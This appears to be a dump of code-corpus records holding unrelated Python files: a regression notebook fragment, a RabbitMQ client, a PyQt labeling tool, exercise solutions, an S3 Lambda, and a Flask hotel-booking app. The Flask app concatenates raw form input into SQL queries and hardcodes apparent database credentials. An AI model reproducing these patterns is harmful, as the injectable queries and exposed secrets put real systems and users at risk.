In[5]:\n\n\nresults.params\n\n\n# #### R-Squared\n\n# In[6]:\n\n\nresults.rsquared\n\n\n# #### Normality Tests\n\n# In[10]:\n\n\nname = ['Jarque-Bera', 'Chi^2 two-tail prob.', 'Skew', 'Kurtosis']\ntest = sms.jarque_bera(results.resid)\nlzip(name, test)\n\n\n# In[11]:\n\n\nname = ['Chi^2', 'Two-tail probability']\ntest = sms.omni_normtest(results.resid)\nlzip(name, test)\n\n\n# #### Influence Tests\n\n# In[12]:\n\n\nfrom statsmodels.stats.outliers_influence import OLSInfluence\ntest_class = OLSInfluence(results)\ntest_class.dfbetas[:5,:]\n\n\n# In[14]:\n\n\nfrom statsmodels.graphics.regressionplots import plot_leverage_resid2\nfig, ax = plt.subplots(figsize=(10,8))\nfig = plot_leverage_resid2(results, ax = ax)\n\n\n# #### Multicollinearity\n\n# In[15]:\n\n\nnp.linalg.cond(results.model.exog)\n\n\n# #### Heteroskedasticity Tests\n\n# ##### Breusch Pagan Test\n\n# In[17]:\n\n\nname = ['Lagrange multiplier statistic', 'p-value', \n 'f-value', 'f p-value']\ntest = sms.het_breuschpagan(results.resid, results.model.exog)\nlzip(name, test)\n\n\n# ##### Goldfeld Quandt Test\n\n# In[18]:\n\n\nname = ['F statistic', 'p-value']\ntest = sms.het_goldfeldquandt(results.resid, results.model.exog)\nlzip(name, test)\n\n\n# #### Harvey Collier Multiplier Test\n\n# In[19]:\n\n\nname = ['t value', 'p value']\ntest = sms.linear_harvey_collier(results)\nlzip(name, test)\n\n\n# #### Influence Plots\n\n# In[21]:\n\n\nfig, ax = plt.subplots(figsize=(12,8))\nfig = sm.graphics.influence_plot(results, ax=ax, criterion=\"cooks\")\n\n","sub_path":"Python/linear-regression/linear_regression.py","file_name":"linear_regression.py","file_ext":"py","file_size_in_byte":2228,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"40562210","text":"from dataclasses import dataclass, asdict\nfrom typing import Optional\n\nfrom galaxy.api.types import Achievement\n\nfrom cache import Cache\n\n\n@dataclass\nclass Fingerprint:\n time_played: int\n last_played_time: Optional[int]\n\n\ndef as_dict(cache: Cache) -> dict:\n dict_ = {}\n for key, achievements, fingerprint in cache:\n achievements = [asdict(achievement) for achievement in achievements]\n dict_[key] = {\n \"achievements\": achievements,\n \"fingerprint\": asdict(fingerprint)\n }\n return dict_\n\n\ndef from_dict(dict_: dict) -> Cache:\n cache = Cache()\n for key, value in dict_.items():\n try:\n achievements = value[\"achievements\"]\n achievements = [Achievement(**achievement) for achievement in achievements]\n fingerprint = value[\"fingerprint\"]\n fingerprint = Fingerprint(**fingerprint)\n except (KeyError, TypeError, AssertionError) as error:\n raise ValueError(\"Failed to deserialize cache from dictionary\") from error\n cache.update(key, achievements, fingerprint)\n return cache\n","sub_path":"src/achievements_cache.py","file_name":"achievements_cache.py","file_ext":"py","file_size_in_byte":1109,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"71491789","text":"\"\"\" Conecta a RabbitMQ usando protocolo TLS \"\"\"\nimport ssl\nimport pika\n\nclass RabbitMQ():\n \"\"\" Conecta a RabbitMQ \"\"\"\n\n @classmethod\n def __init__(cls):\n \"\"\" Establece conexion con RabbitMQ \"\"\"\n cls.cxt = ssl.SSLContext(ssl.PROTOCOL_TLSv1_2)\n cls.ssl_options = pika.SSLOptions(\n context=cls.cxt,\n server_hostname=\"HOST_NAME\"\n )\n cls.credentials = pika.PlainCredentials('USER', 'PASSWORD')\n cls.parameters = pika.ConnectionParameters(\n 'HOST',\n 'PORT',\n 'VIRTUAL_HOST',\n cls.credentials,\n ssl_options=cls.ssl_options)\n cls.connection = pika.BlockingConnection(cls.parameters)\n cls.channel = cls.connection.channel()\n\n @classmethod\n def send_message(cls):\n \"\"\" Envia Mensaje a RabbitMQ \"\"\"\n cls.channel.basic_publish(\n exchange='EXCHANGE',\n routing_key='ROUTING_KEY',\n body='Hello World!')\n print(\" [x] Sent 'Hello World!'\")\n\n @classmethod\n def disconnect(cls):\n \"\"\" Cierra la conexión con RabbitMQ \"\"\"\n cls.connection.close()\n\nif __name__ == \"__main__\":\n RabbitMQ().send_message()\n","sub_path":"rabbitmq.py","file_name":"rabbitmq.py","file_ext":"py","file_size_in_byte":1210,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"567746419","text":"from flask_mysqldb import MySQL\r\n#from codes.DatabaseUtil import InitializeData\r\nfrom flask import Flask, flash, redirect, render_template, request, session, abort, jsonify, url_for\r\n#from flask_login import login_user\r\nimport os\r\nimport sys\r\n\r\napp = Flask(__name__)\r\n\r\napp.config['MYSQL_HOST'] = 'dijkstra.ug.bcc.bilkent.edu.tr'\r\napp.config['MYSQL_USER'] = 'sena.yilmaz'\r\napp.config['MYSQL_PASSWORD'] = '97hws1Lr'\r\napp.config['MYSQL_DB'] = 'sena_yilmaz'\r\n\r\nmysql = MySQL(app)\r\n\r\n@app.route('/')\r\n@app.route('/indexpage')\r\ndef indexpage():\r\n\treturn render_template('index.html')\r\n\r\n@app.route('/loginpage', methods=[\"GET\", \"POST\"])\r\ndef loginpage():\r\n data = []\r\n if (request.method == 'POST'):\r\n\t username = request.form['username']\r\n\t password = request.form['password']\r\n\r\n\t cur = mysql.connection.cursor()\r\n\t cur.execute(\"select * from Hotel_Users where username='\" + username + \"' and password='\" + password + \"'\")\r\n \r\n for row in cur :\r\n data.append(row)\r\n\r\n if (len(data)>0):\r\n user_id = data[0]\r\n session['user_id'] = user_id[0]\r\n return redirect(url_for('guesthomepage'))\r\n\r\n else:\r\n flash(\"Error\")\r\n return render_template('wronglogin.html')\r\n\r\n@app.route('/registerpage', methods=[\"GET\", \"POST\"])\r\ndef registerpage():\r\n\tif request.method == 'GET':\r\n\t\treturn render_template('register.html')\r\n\telse:\r\n\t\tusername = request.form['username']\r\n\t\tpassword = request.form['password']\r\n\t\tbdate = request.form['bdate']\r\n\t\tgender = request.form['gender']\r\n\t\taddress = request.form['address']\r\n\r\n\t\tcur = mysql.connection.cursor()\r\n\t\tcur.execute(\"INSERT INTO Hotel_Users (username, password, bdate, gender, address) VALUES ('\" + username + \"','\" + password + \"','\" + bdate + \"','\" + gender + \"','\" + address + \"')\")\r\n\t\tmysql.connection.commit()\r\n\r\n\t\treturn render_template('index.html')\r\n\r\n@app.route('/guesthomepage', methods=[\"GET\", \"POST\"])\r\ndef guesthomepage():\r\n\tuser_id = session['user_id']\r\n\tif request.method == 'GET':\r\n\r\n\t\tcur = mysql.connection.cursor()\r\n\t\tcur.execute(\"select * from Reservation where user_ID='\" + str(user_id) + \"'\")\r\n\t\tdata = cur.fetchall()\r\n\t\tcur.execute(\"select username from Hotel_Users where user_ID='\" + str(user_id) + \"'\")\r\n\t\tname = cur.fetchone()\r\n\r\n\t\treturn render_template('guesthomepage.html', data=data, name=name)\r\n\r\n@app.route('/bookreservationpage', methods=[\"GET\", \"POST\"])\r\ndef bookreservationpage():\r\n\tif request.method == 'GET':\r\n\t\treturn render_template('bookreservation.html')\r\n\telse:\r\n\t\tcheck_in_date = request.form['check_in_date']\r\n\t\tcheck_out_date = request.form['check_out_date']\r\n\t\tnumOfStayers = request.form['numOfStayers']\r\n\r\n\t\tcur = mysql.connection.cursor()\r\n\t\t#price = ((check_out_date - check_in_date).days )*(numOfStayers*150)\r\n\t\tuser_id = session['user_id']\r\n\t\tprice = 3000\r\n\t\tcur.execute(\"INSERT INTO Reservation (reservation_date, check_in_date, check_out_date, numOfStayers, price, user_ID) VALUES (CURDATE(), '\" + check_in_date + \"','\" + check_out_date + \"','\" + str(numOfStayers) + \"', '\" + str(price) + \"', '\" + str(user_id) + \"')\")\r\n\t\tmysql.connection.commit()\r\n\r\n\t\treturn redirect(url_for('guesthomepage'))\r\n\r\n\r\n@app.route('/foodorders', methods=[\"GET\", \"POST\"])\r\ndef foodorders():\r\n\tuser_id = session['user_id']\r\n\torderdata =[]\r\n\tfooddata = []\r\n\tif request.method == 'GET':\r\n\t\tcur = mysql.connection.cursor()\r\n\t\tcur.execute(\"select order_id,order_date,food_id from Orders where user_ID='\" + str(user_id) + \"'\")\r\n\t\torders = cur.fetchall()\r\n\t\treturn render_template('foodorders.html', orders=orders)\r\n\t\r\n\telse:\r\n\t\torderid = request.form['selectedorderid']\r\n\t\tcur = mysql.connection.cursor()\r\n\t\tcur.execute(\"select order_date,food_id from Orders where order_id='\" + str(orderid) + \"'\")\r\n\r\n\t\tfor row in cur:\r\n\t\t\torderdata.append(row)\r\n\t\torderdate = orderdata[0][0]\r\n\t\tfoodid = orderdata[0][1]\r\n\r\n\t\tcur.execute(\"SELECT restaurant_id,food_name,food_price from Food where food_id='\" + str(foodid) + \"'\")\r\n\t\tfor row in cur:\r\n\t\t\tfooddata.append(row)\r\n\t\t\r\n\t\trestaurantID = fooddata[0][0]\r\n\t\tfoodName = fooddata[0][1]\r\n\t\tfoodPrice = fooddata[0][2]\r\n\t\treturn render_template('fooddetails.html', orderdate = orderdate, restaurantID = restaurantID, foodName=foodName, foodPrice=foodPrice )\r\n\r\n\r\n@app.route('/newfoodorder', methods=[\"GET\", \"POST\"])\r\ndef newfoodorder():\r\n\tuser_id = session['user_id']\r\n\tif request.method == 'GET':\r\n\t\tcur = mysql.connection.cursor()\r\n\t\tcur.execute(\"select food_id,food_name,food_price from Food where restaurant_id='\" + str(1) + \"'\")\r\n\t\trestaurant1 = cur.fetchall()\r\n\t\tcur.execute(\"select food_id,food_name,food_price from Food where restaurant_id='\" + str(2) + \"'\")\r\n\t\trestaurant2 = cur.fetchall()\r\n\t\tcur.execute(\"select food_id,food_name,food_price from Food where restaurant_id='\" + str(3) + \"'\")\r\n\t\trestaurant3 = cur.fetchall()\r\n\r\n\t\treturn render_template('newfoodorder.html', restaurant1=restaurant1,restaurant2=restaurant2,restaurant3=restaurant3 )\r\n\r\n\telse:\r\n\t\tfoodid = request.form['selectedfoodid']\r\n\t\tcur = mysql.connection.cursor()\r\n\t\tcur.execute(\"INSERT INTO Orders (order_date, user_ID, food_id) VALUES (\" + \"CURDATE()\" + \",'\" + str(user_id) +\"','\"+str(foodid) +\"')\")\r\n\t\tmysql.connection.commit()\r\n\t\treturn redirect(url_for('guesthomepage'))\r\n\r\n\r\n\r\n@app.route('/buyticket', methods=[\"GET\", \"POST\"])\r\ndef buyticket():\r\n\tif request.method == 'GET':\r\n\t\treturn render_template('buyticket.html')\r\n\r\n@app.route('/shopping', methods=[\"GET\", \"POST\"])\r\ndef shopping():\r\n\tif request.method == 'GET':\r\n\t\treturn render_template('shopping.html')\r\n\r\n\r\n@app.route('/leavecomment', methods=[\"GET\", \"POST\"])\r\ndef leavecomment():\r\n\tif request.method == 'GET':\r\n\t\treturn render_template('leavecomment.html')\r\n\r\n\r\n\r\nif __name__ == \"__main__\":\r\n\tapp.secret_key = os.urandom(16)\r\n\tapp.run(debug=True)","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":5758,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"333641469","text":"import json\n\nfrom app.api.parties.party_appt.models.mine_party_appt_type import MinePartyAppointmentType\n\n\n# GET\ndef test_get_mine_party_appt_type(test_client, db_session, auth_headers):\n get_resp = test_client.get(\n '/parties/mines/relationship-types', headers=auth_headers['full_auth_header'])\n get_data = json.loads(get_resp.data.decode())\n assert get_resp.status_code == 200\n assert len(get_data) == len(MinePartyAppointmentType.get_all())\n","sub_path":"services/core-api/tests/parties/party_appt/resources/test_mine_party_appt_type_resource.py","file_name":"test_mine_party_appt_type_resource.py","file_ext":"py","file_size_in_byte":463,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"629654122","text":"# coding: utf-8\n \nimport sys, os\nimport numpy as np\nfrom PyQt5 import QtWidgets\nfrom PyQt5 import QtGui\nfrom PyQt5 import uic\nfrom PyQt5 import QtCore, Qt\nfrom PyQt5.QtCore import pyqtSlot\nfrom PyQt5.QtGui import QPixmap, QPainter\nfrom PyQt5.QtWidgets import QFileDialog, QCheckBox, QBoxLayout, QGridLayout\n \nclass Form(QtWidgets.QDialog):\n def __init__(self, parent=None):\n QtWidgets.QDialog.__init__(self, parent)\n self.ui = uic.loadUi(\"label_check.ui\", self)\n self.ui.show()\n \n # self.box_painter = QPainter(self)\n \n self.i = 1\n self.bool = False\n self.first = True\n self.box_count = False\n self.drawbox_line_split = \"\"\n self.box_create = False\n \n @pyqtSlot()\n def nextimage(self):\n if self.first is True:\n # self.i = self.i + 1\n self.loadimage()\n self.showimage()\n # self.saveimage()\n # self.i = self.i + 1\n self.drawbox()\n self.first = False\n else :\n self.saveimage()\n self.i = self.i + 1\n self.loadimage()\n if self.pixmap.width() is not 0 :\n self.showimage()\n self.drawbox()\n # self.saveimage()\n # self.i = self.i + 1\n else :\n self.textBrowser.setText(\"마지막 사진\")\n return\n self.textBrowser.setText(\"저장 완료\")\n \n @pyqtSlot()\n def pass_image(self):\n if self.i is 1:\n self.drawbox()\n self.loadimage()\n self.showimage()\n self.i = self.i + 1\n self.first = False\n else :\n self.drawbox()\n self.loadimage()\n if self.pixmap.width() is not 0 :\n self.showimage()\n self.i = self.i + 1\n else :\n self.textBrowser.setText(\"마지막 사진\")\n self.i = self.i - 1\n return\n if self.box_create is True :\n os.remove(self.drawbox_save_name)\n self.textBrowser.setText(\"저장하지 않음\")\n self.box_create = False\n\n @pyqtSlot()\n def image_load(self):\n # self.fname = QFileDialog.getOpenFileName(self)\n self.img_dir_name = QFileDialog.getExistingDirectory(self)\n self.img_file_path = QFileDialog.getOpenFileName(self)\n self.img_file_name = self.img_file_path[0].replace(self.img_dir_name+\"/\",\"\")\n # print(self.img_file_name)\n # self.img_file_name = self.img_file_name.replace(\"1.jpg\",\"\")\n \n print(\"이미지 이름 및 확장자 :\",self.img_file_name)\n print(\"이미지 경로 :\",self.img_file_path[0])\n self.img_file = self.img_file_name.split(\".\")\n self.img_file_ext = self.img_file[1]\n print(\"이미지 확장자 :\",self.img_file_ext)\n self.img_file_name_only = self.img_file[0][:-1]\n print(\"이미지 이름 :\",self.img_file_name_only)\n self.img_file_num_only = self.img_file[0][-1:]\n print(\"이미지 번호 :\",self.img_file_num_only)\n self.i = int(self.img_file_num_only)\n self.txt_image_load.setText(self.img_file_path[0])\n self.textBrowser.setText(self.img_file_name)\n\n @pyqtSlot()\n def box_file_load(self):\n self.box_file_dir_name = QFileDialog.getExistingDirectory(self)\n self.box_file_path = QFileDialog.getOpenFileName(self)\n self.box_file_name = self.box_file_path[0].replace(self.box_file_dir_name+\"/\",\"\")\n print(\"박스 파일 이름 및 확장자 : \",self.box_file_name)\n print(\"박스 파일 경로 :\",self.box_file_path[0])\n self.box_file = self.box_file_name.split(\".\")\n self.box_file_ext = self.box_file[1]\n print(\"박스 파일 확장자 :\",self.box_file_ext)\n self.box_file_name_only = self.box_file[0][:-1]\n print(\"박스 파일 이름 :\",self.box_file_name_only)\n self.box_file_num_only = self.box_file[0][-1:]\n print(\"박스 파일 번호 :\",self.box_file_num_only)\n \n # self.box_file_name = self.box_file_name.replace(\"1.txt\",\"\")\n # self.txt_image_load.setText(self.box_file_path[0])\n\n\n @pyqtSlot()\n def box_load(self):\n # self.fname = QFileDialog.getOpenFileName(self)\n # self.box_dir_name = QFileDialog.getExistingDirectory(self)\n self.box_file_name = QFileDialog.getOpenFileName(self,'',\"\")\n self.txt_box_text.setText(self.box_file_name[0])\n f = open(self.box_file_name[0], 'r')\n self.flines = f.readlines()\n\n self.grid = np.zeros((len(self.flines),1))\n if len(self.flines) > 0 :\n self.textBrowser.setText(\"Classes : \"+str(len(self.flines)))\n # self.grid_layout = QGridLayout()\n # self.setLayout(self.grid_layout)\n # print(len(flines))\n for i in range(len(self.flines)):\n self.btn = QCheckBox(self.flines[i])\n # self.btn.move(50*i, 1)\n self.grid_layout.addWidget(self.btn,i,0)\n self.btn.stateChanged.connect(self.click)\n\n else :\n print(\"No such file\")\n\n f.close()\n\n def click(self, state) :\n self.ischeck_count = 0\n if state == Qt.Qt.Checked :\n for i in range(len(self.flines)):\n item = self.grid_layout.itemAtPosition(i,0)\n widget = item.widget()\n self.grid[i][0] = widget.isChecked()\n # print(self.grid[i][0])\n\n if self.grid[i][0] > 0 :\n self.ischeck_count = self.ischeck_count + 1\n # print(self.ischeck_count)\n if self.ischeck_count > 1 :\n for i in range(len(self.flines)):\n item = self.grid_layout.itemAtPosition(i,0)\n widget = item.widget()\n self.grid[i][0] = widget.setChecked(False)\n self.grid[i][0] = 0\n else :\n for i in range(len(self.flines)):\n item = self.grid_layout.itemAtPosition(i,0)\n widget = item.widget()\n self.grid[i][0] = widget.isChecked()\n self.ischeck_count = 0\n pass\n\n # print(self.grid)\n\n @pyqtSlot()\n def origin_image(self):\n self.origin_img_dir_name = QFileDialog.getExistingDirectory(self)\n self.origin_img_path = QFileDialog.getOpenFileName(self)\n self.origin_img_name = self.origin_img_path[0].replace(self.origin_img_dir_name+\"/\",\"\")\n print(\"원본 이미지 이름 및 확장자 :\", self.origin_img_name)\n print(\"원본 이미지 경로 :\",self.origin_img_path[0])\n self.origin_img_file = self.origin_img_name.split(\".\")\n print(\"원본 이미지 확장자 :\",self.origin_img_file[1])\n self.origin_img_file_ext = self.origin_img_file[1]\n self.origin_img_file_name = self.origin_img_file[0][:-1]\n self.origin_img_file_num = self.origin_img_file[0][-1:]\n print(\"원본 이미지 이름 :\",self.origin_img_file_name)\n print(\"원본 이미지 번호 :\",self.origin_img_file_num)\n # self.origin_img_name = self.origin_img_name.replace(\".txt\",\"\")\n\n @pyqtSlot()\n def image_save(self):\n self.img_save_path = QFileDialog.getExistingDirectory(self)\n self.txt_save_path.setText(self.img_save_path)\n\n @pyqtSlot()\n def success(self):\n self.img_save_name = self.txt_save_name.text()\n # self.txt_save_name.clear()\n self.txt_save_name.setText(self.img_save_name)\n # print(self.img_save_name)\n \n @pyqtSlot()\n def next_box(self):\n for i in range(len(self.flines)):\n item = self.grid_layout.itemAtPosition(i,0)\n widget = item.widget()\n if widget.isChecked() :\n self.checkbox_i = i\n self.grid[i][0] = widget.setChecked(False)\n self.grid[i][0] = 0\n \n if self.box_count is True:\n self.drawbox_save_name = self.img_save_path+\"/\"+self.img_save_name+str(self.i)+\".txt\"\n f_save_box = open(self.drawbox_save_name, 'a')\n # print(str(self.checkbox_i)+\" \"+str(self.drawbox_line_split[1])+\" \"+str(self.drawbox_line_split[2])+\" \"+str(self.drawbox_line_split[3])+\" \"+str(self.drawbox_line_split[4])+\"\\n\")\n f_save_box.write(str(self.checkbox_i)+\" \"+str(self.drawbox_line_split[1])+\" \"+str(self.drawbox_line_split[2])+\" \"+str(self.drawbox_line_split[3])+\" \"+str(self.drawbox_line_split[4])+\"\\n\")\n f_save_box.close()\n self.box_create = True\n\n if self.drawbox_lines.__len__() is not 0:\n self.drawbox_line = self.drawbox_lines.pop()\n print(self.drawbox_line)\n # print(self.drawbox_line)\n self.drawbox_line = self.drawbox_line[:-2]\n # print(self.drawbox_line)\n self.drawbox_line_split = self.drawbox_line.split(' ')\n # print(self.drawbox_line_split)\n self.drawbox_center_x = self.pixmap.width() * self.pixmap_resize_width * float(self.drawbox_line_split[1])\n self.drawbox_center_y = self.pixmap.height() * self.pixmap_resize_height * float(self.drawbox_line_split[2])\n self.drawbox_width = self.pixmap.width() * self.pixmap_resize_width * float(self.drawbox_line_split[3])\n self.drawbox_height = self.pixmap.height() * self.pixmap_resize_height * float(self.drawbox_line_split[4])\n # print(self.drawbox_center_x, self.drawbox_center_y, self.drawbox_width, self.drawbox_height)\n self.box_edit.move(self.drawbox_center_x + (self.pixmap_resize_width*12) - (self.drawbox_width/2), self.drawbox_center_y + (self.pixmap_resize_height*76) - (self.drawbox_height/2))\n self.box_count = True\n else :\n print(\"박스정보 저장완료\\n박스가 더이상 존재하지않음\")\n self.box_count = False\n\n def drawbox(self):\n # print(\"d\")\n self.drawbox_file_name = self.box_file_dir_name+\"/\"+self.box_file_name_only+str(self.i)+\".\"+self.box_file_ext\n # self.drawbox_file_name = \"/home/kdh/ml/label_check/person\"+str(self.i)+\".txt\"\n f_box = open(self.drawbox_file_name, 'r')\n self.drawbox_lines = f_box.readlines()\n # print(\"뒤집기 전 :\\n\",self.drawbox_lines)\n self.drawbox_lines.reverse()\n # print(\"뒤집기 후 :\\n\",self.drawbox_lines)\n\n f_box.close()\n # self.pixmap = QPixmap(\"/home/kdh/ml/label_check/person\"+str(self.i)+\".txt\")\n # self.pixmap = QPixmap(self.img_dir_name+\"/\"+self.img_file_name+str(self.i)+\".txt\")\n \n \n def loadimage(self):\n self.label = self.label_image\n # self.pixmap = QPixmap(\"/home/kdh/ml/label_check/box_person\"+str(self.i)+\".jpg\")\n self.pixmap = QPixmap(self.img_dir_name+\"/\"+self.img_file_name_only+str(self.i)+\".\"+self.img_file_ext)\n # self.pixmap = QPixmap(self.img_dir_name+\"/\"+self.img_file_name)\n # print(\"불러오는 파일 경로 및 이름 :\",self.img_dir_name+\"/\"+self.img_file_name)\n print(\"불러오는 파일 경로 및 이름 :\",self.img_dir_name+\"/\"+self.img_file_name_only+str(self.i)+\".\"+self.img_file_ext)\n\n \n def showimage(self):\n # self.label.setAlignment(Qt.Qt.AlignCenter)\n # self.label.setPixmap(self.pixmap.scaledToWidth(self.pixmap.scaledToHeight(self.label_image.height()).width()))\n self.pixmap_resize_height = self.pixmap.scaledToHeight(self.label_image.height()).height() / self.pixmap.height()\n self.pixmap_resize_width = self.pixmap.scaledToWidth(self.pixmap.scaledToHeight(self.label_image.height()).width()).width()/self.pixmap.width()\n print(self.pixmap_resize_height,\" \",self.pixmap_resize_width)\n self.label.setPixmap(self.pixmap.scaledToWidth(self.pixmap.scaledToHeight(self.label_image.height()).width()))\n # self.label.setPixmap(self.pixmap)\n\n def saveimage(self):\n # self.origin_pixmap = QPixmap(self.origin_img_dir_name+\"/\"+self.origin_img_name)\n self.origin_pixmap = QPixmap(self.origin_img_dir_name+\"/\"+self.origin_img_file_name+str(self.i)+\".\"+self.origin_img_file_ext)\n self.origin_pixmap.save(self.img_save_path+\"/\"+self.img_save_name+str(self.i)+\".png\")\n # print(\"저장할 원본이미지 경로 및 이름\",self.origin_img_dir_name+\"/\"+self.origin_img_name)\n print(\"저장할 원본이미지 경로 및 이름\",self.origin_img_dir_name+\"/\"+self.origin_img_file_name+str(self.i)+\".\"+self.origin_img_file_ext)\n print(\"저장 된 원본이미지 경로 및 이름\",self.img_save_path+\"/\"+self.img_save_name+str(self.i)+\".png\")\n # self.pixmap.save(\"/home/kdh/ml/label_check/newperson\"+str(self.i)+\".png\")\n\n\nif __name__ == '__main__':\n app = QtWidgets.QApplication(sys.argv)\n w = Form()\n sys.exit(app.exec())\n","sub_path":"label_check.py","file_name":"label_check.py","file_ext":"py","file_size_in_byte":12915,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"297372493","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Jun 2 23:26:04 2019\n\n@author: nirav\n\nDescription: Extra Long Factorials\n\"\"\"\n\n#!/bin/python3\n\nimport sys\n\n# Complete the diagonalDifference function below.\ndef findHappiness(n, a, b):\n \n tempN = n[:]\n tempNN = n[:]\n \n listA = list(set(n) - set(a))\n listB = list(set(n) - set(b))\n \n for i in range(0, len(listA)):\n for j in range(0, len(n)):\n if (listA[i] == n[j]) == True:\n tempN.remove(listA[i])\n \n for i in range(0, len(listB)):\n for j in range(0, len(n)):\n if (listB[i] == n[j]) == True:\n tempNN.remove(listB[i])\n \n print(len(tempN) - len(tempNN))\n\nif __name__ == '__main__':\n\n n = [1,5,3,3,3,8,8]\n a = [3,1]\n b = [5,7]\n \n findHappiness(n, a, b)\n \n\n","sub_path":"Problem Solving/extra_long_factorials.py","file_name":"extra_long_factorials.py","file_ext":"py","file_size_in_byte":846,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"171030699","text":"#Runtime 52ms, Beats 50.95%\n# O(n)\n# Basic idea: iteratively search the whole nums list to find the maximum reachable range.\nclass Solution(object):\n def canJump(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: bool\n \"\"\"\n reach,i = 0,0\n while i<=reach and i=len(nums)-1 else False\n\n# Original idea of recursion: maximum recursion depth exceeded while calling a Python object\nclass Solution(object):\n def canJump(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: bool\n \"\"\"\n self.result = False\n self.search(nums,nums[0],0)\n return self.result\n\n def search(self,nums,cur_1,cur_2):\n while cur_1<=len(nums)-1 and nums[cur_1]!=0:\n cur_2 = cur_1\n cur_1 += nums[cur_1] \n if cur_1>=len(nums)-1:\n self.result = True\n return\n elif nums[cur_1]==0:\n for i in xrange(cur_2+1,cur_1):\n self.search(nums,nums[i],i)\n return\n","sub_path":"Array/55.Jump Game.py","file_name":"55.Jump Game.py","file_ext":"py","file_size_in_byte":1124,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"187906109","text":"import base64\r\nimport json\r\nimport os\r\n\r\nimport boto3\r\n\r\n# Create an S3 client\r\ns3 = boto3.client('s3')\r\nbucket_name = os.environ['S3_BUCKET_DOCUMENTOS']\r\n\r\n\r\ns3 = boto3.client('s3')\r\ndef uploadId(event, context):\r\n if event['method'] == 'POST' :\r\n event = event.get('body')\r\n name = event['name']\r\n correo = event['correo']\r\n correo, dominio = correo.split(\"@\")\r\n correo = correo + \"-\" + dominio\r\n image = event['file']\r\n image = image[image.find(\",\")+1:]\r\n path = correo + \"/\" + name;\r\n dec = base64.b64decode(image + \"===\")\r\n s3.put_object(Bucket=bucket_name, Key=path, Body=dec)\r\n return {'statusCode': 200, 'body': json.dumps({'message': 'successful lambda function call'}), 'headers': {'Access-Control-Allow-Origin': '*'}}\r\n\r\n","sub_path":"Onboarding/src/s3/documentos/uploadIdCard.py","file_name":"uploadIdCard.py","file_ext":"py","file_size_in_byte":812,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"610333455","text":"\n\"\"\"this functions get's the raw input from the user and splits it into a list that\ncontains the individual constrains on the output in a proper format \n\nie. if the input is body: stock confidential shares date < 2001/04/12\nthe function will return [body:stock,confidential,shares,date<2001/04/12] \"\"\"\n\nfrom bsddb3 import db\n\ndef main():\n query_input=get_input()\n query_system(query_input,'full')\n pass\n\n\n\ndef get_input():\n \n keywords=[':', '>','<','>=','<=','&']\n query_input=raw_input('Please enter a query using the provided grammar ')\n query_input=query_input.split()\n \n for i in range(0,len(query_input)-1):\n for keyword in keywords:\n if query_input[i][-1] not in keywords and query_input[i+1][0] not in keywords:\n query_input[i]=query_input[i] +'&'\n \n query_input=''.join(query_input)\n query_input=query_input.split('&')\n \n \n return query_input\n \n \n\"\"\" this function makes the actual queries\"\"\" \n \ndef query_system(query_input,output_mode):\n \n queries_results=[]\n \n for query in query_input:\n query=query.split(':')\n \n if query[0] in ['to','cc','bcc','from','to']:\n query_result=email_adress_queries(query)\n query_result=set(query_result)\n\n queries_results.append(query_result)\n \n # if type of query == key_word for query type\n #perform the query for the given operator\n \n #query_result.append(list of rows ids output from the query\n # maybe this can be written as a separate function that directly outputs the list of row ids that needs to be appended\n \n \n \n \n # if type of query == key_word for another query type\n #perform the query for the given operator\n \n #same as above\n \n \n \n #and so on with all the types\n \n #take the intersection of all the list inside the query_results and make a set\n \n rows_id=queries_results[0]\n for query_result in queries_results:\n temp = query_result.intersection(rows_id)\n rows_id=temp\n \n \n \n #print result depending on the output mode\n \n rows_id=list(rows_id)\n if output_mode=='full':\n retrieve_emails(rows_id)\n else:\n print(\"Emails ids\")\n rows_id=list(rows_id)\n rows_id.sort()\n for element in rows_id:\n \n print(element)\n \n \n \n #if output mode equal brief\n #return set of the intersection\n \n # if output mode equal full\n \n \n #query again for the full record \n \n \n \ndef email_adress_queries(query):\n\n \n DB_File = \"em.idx\"\n database=db.DB()\n database.open(DB_File,None,db.DB_BTREE)\n curs=database.cursor()\n result=[]\n txt='%s-%s' %(query[0], query[1])\n \n \n value=curs.set(txt.encode(\"utf-8\"))\n if value != None:\n result.append(str(value[1].decode(\"utf-8\")))\n \n dup=curs.next_dup()\n \n while dup!= None:\n result.append(str(dup[1].decode(\"utf-8\")))\n dup=curs.next_dup()\n else:\n result.append(None)\n curs.close()\n database.close()\n \n return result\n \n\"\"\" this following function prints the whole text if the ouput mode is full \"\"\" \n\ndef retrieve_emails(rows_id):\n \n DB_File =\"re.idx\"\n database=db.DB()\n database.open(DB_File,None,db.DB_HASH)\n curs=database.cursor()\n emails=[]\n for element in rows_id:\n emails.append(curs.set(element.encode(\"utf-8\")))\n \n \n for email in emails:\n print(email[1])\n curs.close()\n database.close()\n \n \nmain() \n ","sub_path":"Phase3.py","file_name":"Phase3.py","file_ext":"py","file_size_in_byte":3864,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"259688137","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Mar 12 11:17:52 2014\r\n\r\n@author: OCC, ZWY\r\n\r\nThis library is currently a collection of all\r\nnormalization & denormalization methods.\r\nThe methods are grouped together by categories, \r\ni.e. e.g. denormSigmoid is placed right after\r\nnormSigmoid.\r\n\r\nFor ease of specifying a particular method,\r\nnormActiv and denormActiv accepts as arguments data\r\nsphering options and activation function options.\r\n\r\nThis library is expected to be used by SAE and SSAE 